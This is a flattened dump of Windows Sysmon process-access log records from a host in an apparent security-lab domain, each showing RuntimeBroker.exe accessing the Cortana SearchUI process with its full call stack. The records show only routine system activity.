13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 